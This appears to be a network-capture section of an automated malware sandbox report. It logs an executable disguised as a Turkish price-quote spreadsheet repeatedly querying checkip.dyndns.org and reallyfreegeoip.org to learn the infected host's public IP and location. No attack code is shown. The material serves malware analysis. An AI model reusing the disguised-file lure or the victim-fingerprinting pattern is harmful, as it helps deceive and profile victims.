Oct 7, 2024 17:10:13.926199913 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c675b030ddef94072abd2cc32e31aaca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49751	132.226.247.73	80	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 17:10:14.535293102 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 17:10:15.210855007 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4aff80d98e852eade424423ea9f6931a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	132.226.247.73	80	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 17:10:16.559155941 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 17:10:18.200720072 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d5a43d4be7028ebb98bc3190c83a9a9a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 17:10:18.200891972 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d5a43d4be7028ebb98bc3190c83a9a9a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 17:10:18.200922012 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d5a43d4be7028ebb98bc3190c83a9a9a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 17:10:18.201116085 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d5a43d4be7028ebb98bc3190c83a9a9a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:00 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 15:10:00 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70135 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bv%2BG0OE95ffvLdHzh4ZjHWSq7uSABcPnXwQesX2JqjqSzpyWwwqrHBjUAw4oaDMADPyR3xd60H2Ge6TDmkcFQJw8n4vag4IjbWe32Azkfv%2B4qnPudWPGvGgDwH5plJ7HZZtVggyN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed0c61b4443c8-EWR
2024-10-07 15:10:00 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:01 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 15:10:02 UTC	678	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70137 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T73yPGbcEaqzAzihXoqzDurlWgKELFykGCKWSvFUrxE0CVi0x%2FbCe7Ueegd64DNwnrAqsMsTIbXGVJlE9VnC71C07JLA%2FHXCQAI4cJuy7z786IEzF9rH3%2FM3H%2BP8fLdiEtILD9qm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed0cf3e2c2365-EWR
2024-10-07 15:10:02 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:08 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 15:10:09 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70144 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCr6t8IXo082XU4O%2FtnzLsdISUElYiJbA1QgU9iZAXNiP52XqrfrfF3icev7imMT9VJoQIG3OjFY%2FTV148qXXj1imCPLDMq7%2BiiKUaOR75Zy761XzyOwIVGblT5quNut0BPXdepy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed0fa9b388c48-EWR alt-svc: h3=":443"; ma=86400
2024-10-07 15:10:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:11 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 15:10:11 UTC	672	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70146 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hSFj7kk0A7GyovQUPdZYrUAn6cYX7x7SoaHcJxyHnWfOHbkzPvNgG0qBoOupQFEOMhrgq5oZtJmpb63YNnNxPZoxyjPkjL7iH5fWU7HFhABhm%2FnbpYqSpFHbaHgvsdc2NcpXmfWh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed10bfdd17cae-EWR
2024-10-07 15:10:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:13 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 15:10:13 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70148 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1vxfRSpxnYnEHg7NGujwRryQi3iht5t56EPEgzyA2qjFmTQ8%2Fbt7ePw46mawZ0rB80CRhuD8pQzYLUzxtD5QHF8Obq8Skjzjj1Ew1QfTTZ2giovaJ0ulYlcc2Zv%2F95XKfo8aYyAF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed113dd355e70-EWR
2024-10-07 15:10:13 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 15:10:14 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70149 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wycXgF7NRo0EbOaZCT9vwG99Gc21j0OiagNs0ago4FZ1Kn0BaHIFNM5aKJMe8NyrJq7rwS%2Ff1q9B2RfcgzokHC2CsdkJoBuWrm%2F35DCm3szOWLdZch2epO3oXfCJ7%2Fw1Z10CvF8W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed11c59b019df-EWR alt-svc: h3=":443"; ma=86400
2024-10-07 15:10:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49753	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:16 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 15:10:16 UTC	686	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70151 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ov%2FCq5n4%2F7%2BpEGbnowQMF%2Bd4myG5j84yYYlkX4vi5EsM7Sacw159oWRuWr9ekw3yVffbqxt%2FA5qwbQcTu6oVg9wkfCE8I%2FbT%2BB2vU8lsDnvaRJzcJj1kMQ4a8DdRPHwOW7%2BV9Wup"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed128ede70cbd-EWR
2024-10-07 15:10:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	188.114.97.3	443	6308	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 15:10:18 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 15:10:18 UTC	682	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 15:10:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 70153 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qwMmQH%2B1Zhz4mgKd2ClR3xSpW5stjKvzEtKcjM5bHXivnB93jPaiqZt2AcE%2BLYuDy2NJ%2BJPUXNZI6H%2FgeZMVQxXBrqIK3j5ZWnEybV4IFX7PUjnhPE%2BIwggDDpy%2BMi3psvdJoio0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ceed1371aba4368-EWR
2024-10-07 15:10:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 15:10:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:09:54
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Wow64 process (32bit):	true
